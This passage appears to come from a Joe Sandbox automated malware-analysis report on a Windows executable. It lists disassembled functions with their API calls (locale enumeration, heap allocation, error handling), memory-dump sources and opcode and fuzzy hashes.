                                                                                                                                                                  • Opcode Fuzzy Hash: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A51E722B0479185F720AB72BC40AAEBBB5EB507E4F845135EE9C37A89CE78D001CB40
                                                                                                                                                                  Function 00007FF72CA14410 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue$InfoLocale
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 673564084-578493202
                                                                                                                                                                  • Opcode ID: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
                                                                                                                                                                  • Instruction ID: daa7de7419d0e8c3c1efad28f4a8cf3cdae6b9313b17c90464d4a462ec45b5e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
                                                                                                                                                                  • Instruction Fuzzy Hash: E3319832A0868287FB24EB26F841BB9B3B0FB64794F849135DA5D83685DF7CE4518B50
                                                                                                                                                                  Function 00007FF72CA08D4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                  • Opcode ID: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
                                                                                                                                                                  • Instruction ID: b632dc7df4f4908c8b6b32dd747e218ee60d92298af77ce786d16731a57ef1dd
                                                                                                                                                                  • Opcode Fuzzy Hash: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E018F21B09A51C6FB40AB66F8009A6E670FFA8BF0F984035DE4D13B69CE3CD5418B55
                                                                                                                                                                  Function 00007FF72CA08874 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF72CA08D1B,?,?,?,?,?,?,?,?,00000000,00007FF72CA136B0), ref: 00007FF72CA088C3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2099609381-578493202
                                                                                                                                                                  • Opcode ID: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
                                                                                                                                                                  • Instruction ID: 3b8573141ab40c44c06956c15d80f0a5c282a4438a68392d6a5913737b7499b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
                                                                                                                                                                  • Instruction Fuzzy Hash: 87F06D71A04B4583E700EB25FC91AA9B3B1FBA87D0F948035EA0D93364CE3CD4608B40
                                                                                                                                                                  Function 00007FF72C9D8010 Relevance: 3.4, APIs: 2, Instructions: 368COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 73155330-0
                                                                                                                                                                  • Opcode ID: f1f6c8a2cc95e2b91cb7107076a8c5cb21c1f7d95be88b1eb0dde1ebd421c5a1
                                                                                                                                                                  • Instruction ID: 19af0660019a269152451f10a68a97e17e6be87929837ab2392c75f90c1c6c9d
                                                                                                                                                                  • Opcode Fuzzy Hash: f1f6c8a2cc95e2b91cb7107076a8c5cb21c1f7d95be88b1eb0dde1ebd421c5a1
                                                                                                                                                                  • Instruction Fuzzy Hash: C0E10262A18B8581DA10EF15D84827DB3A4FB68FE4F958631DF9D2378ADF38D490C750
                                                                                                                                                                  Function 00007FF72CA0FDA0 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                  • Opcode ID: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
                                                                                                                                                                  • Instruction ID: 2399c038e88a52d9c870b470b35a21ab2afe992f96a57beb99821f3e5e94053c
                                                                                                                                                                  • Opcode Fuzzy Hash: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 27B17C73600B888BEB15DF29D84676C7BB0F754B98F588822DB9D837A4CB3AD451CB10
                                                                                                                                                                  Function 00007FF72CA0ED1C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF72CA0EDC1
                                                                                                                                                                    • Part of subcall function 00007FF72CA087C4: HeapAlloc.KERNEL32(?,?,00000000,00007FF72CA0715E,?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?), ref: 00007FF72CA08819
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                    • Part of subcall function 00007FF72CA16E8C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA16EBF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 916656526-578493202
                                                                                                                                                                  • Opcode ID: 0f7034db78e482fe59dc97eac92670abfaab9c33c17a880f9e808be5542b9086
                                                                                                                                                                  • Instruction ID: def763b1d3375fc73bef09a3b1f30c8237474699e8fed1971c03fad05d4b6774
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f7034db78e482fe59dc97eac92670abfaab9c33c17a880f9e808be5542b9086
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F41FB21B2928742F7607A327C11F79E2B0EFA1BE0F845535DE8D47785DE3CE4019A20
                                                                                                                                                                  Function 00007FF72CA0A65C Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                                                  • Opcode ID: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
                                                                                                                                                                  • Instruction ID: b2f509da5f6551f7e9d39ea006b1a76b610816c3e8f8595839e22eedcaa38392
                                                                                                                                                                  • Opcode Fuzzy Hash: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
                                                                                                                                                                  • Instruction Fuzzy Hash: E2516822B182C546F7249A35AC04B69BBA1F764BE4F88C231CB9987AC5DE3DD805CB10
                                                                                                                                                                  Function 00007FF72C9E83A0 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.$Value is not convertible to double.
                                                                                                                                                                  • API String ID: 0-3518352406
                                                                                                                                                                  • Opcode ID: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
                                                                                                                                                                  • Instruction ID: a89623c8ef6c668bc49b47ece1aad2984132d532de0e15e2d74e13fa68750d7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F31E721E1C98245FA62F734E8623B9D3A1FFFA724FC44132D68E52695EE2DE141CE10
                                                                                                                                                                  Function 00007FF72CA12298 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 12414fa0cc38e188fbb466e1c36ac0ca271386ebc649a9602594163aab2e07d8
                                                                                                                                                                  • Instruction ID: fc8922f3a2b92797d829d42626bc19d55ac939d59db45695d408a8fe355d5760
                                                                                                                                                                  • Opcode Fuzzy Hash: 12414fa0cc38e188fbb466e1c36ac0ca271386ebc649a9602594163aab2e07d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 45E16132A04B8186E720DB61F8506EEB7B4FBA4798F404635DB8D53B96EF78E245C710
                                                                                                                                                                  Function 00007FF72C9FB1E4 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 0-578493202
                                                                                                                                                                  • Opcode ID: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
                                                                                                                                                                  • Instruction ID: 55fc3e3704bc1cb88d2ca53f8c68be7f28d4be8ce68acba419e5f2e39a5063f4
                                                                                                                                                                  • Opcode Fuzzy Hash: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
                                                                                                                                                                  • Instruction Fuzzy Hash: 4BD10932A0864281EB69AF29C95027DA3A8FF65B68F944135CE8D077D4CF7DE845CB60
                                                                                                                                                                  Function 00007FF72CA14060 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: GetLastError.KERNEL32 ref: 00007FF72CA06F93
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: FlsGetValue.KERNEL32 ref: 00007FF72CA06FA8
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: SetLastError.KERNEL32 ref: 00007FF72CA07033
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF72CA1484F,?,00000000,00000092,?,?,00000000,?,00007FF72CA04DC1), ref: 00007FF72CA140FE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3029459697-0
                                                                                                                                                                  • Opcode ID: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                  • Instruction ID: 1939e0fac96f3377793d09632888509d113de7ddfea75a27a78d0e9e9bdffa92
                                                                                                                                                                  • Opcode Fuzzy Hash: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E11D567E086458AEB149F1AF840AA9B7B1F760BF0F849135C659433C4CE6CD5D1CB50
                                                                                                                                                                  Function 00007FF72CA04C10 Relevance: 1.6, Strings: 1, Instructions: 309COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 4023145424-578493202
                                                                                                                                                                  • Opcode ID: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
                                                                                                                                                                  • Instruction ID: c7d4a3f6e4941d33c2ccd2ff31bc190acb66b5b07c3b5a0b4fff47ca5d27778e
                                                                                                                                                                  • Opcode Fuzzy Hash: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
                                                                                                                                                                  • Instruction Fuzzy Hash: BCC1B526A0868245FB60AB71AD10BBEA7B0FFA4BE8F804135DE8D47695DF3CD545CB10
                                                                                                                                                                  Function 00007FF72CA14618 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: GetLastError.KERNEL32 ref: 00007FF72CA06F93
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: FlsGetValue.KERNEL32 ref: 00007FF72CA06FA8
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: SetLastError.KERNEL32 ref: 00007FF72CA07033
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00007FF72CA143C2), ref: 00007FF72CA1464F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$InfoLocaleValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3796814847-0
                                                                                                                                                                  • Opcode ID: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                  • Instruction ID: 3d0afdb37bb759f3d81ff46ffc094396b59e1c3de6c6e5cd3566b51a1037adf0
                                                                                                                                                                  • Opcode Fuzzy Hash: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                  • Instruction Fuzzy Hash: BD113831B1855242E774A729B940FBAA2B1EB60778F945231D639036C0DE69D8818B10
                                                                                                                                                                  Function 00007FF72CA14130 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: GetLastError.KERNEL32 ref: 00007FF72CA06F93
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: FlsGetValue.KERNEL32 ref: 00007FF72CA06FA8
                                                                                                                                                                    • Part of subcall function 00007FF72CA06F84: SetLastError.KERNEL32 ref: 00007FF72CA07033
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF72CA1480B,?,00000000,00000092,?,?,00000000,?,00007FF72CA04DC1), ref: 00007FF72CA141AE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3029459697-0
                                                                                                                                                                  • Opcode ID: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                  • Instruction ID: 94b385f8557144eb775fbb75fe845633c8be47706ebb2c37108e5c0322a7141a
                                                                                                                                                                  • Opcode Fuzzy Hash: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                  • Instruction Fuzzy Hash: AA01B972F0814546E7106F19FC40BB9B6F1FB707B4F859231D669476C4CFA894819B10
                                                                                                                                                                  Function 00007FF72CA13774 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1500699246-578493202
                                                                                                                                                                  • Opcode ID: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
                                                                                                                                                                  • Instruction ID: eb7b84f6cb1738ff50d39d559e957c439a8b307f9973714f9adfa08550160b05
                                                                                                                                                                  • Opcode Fuzzy Hash: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
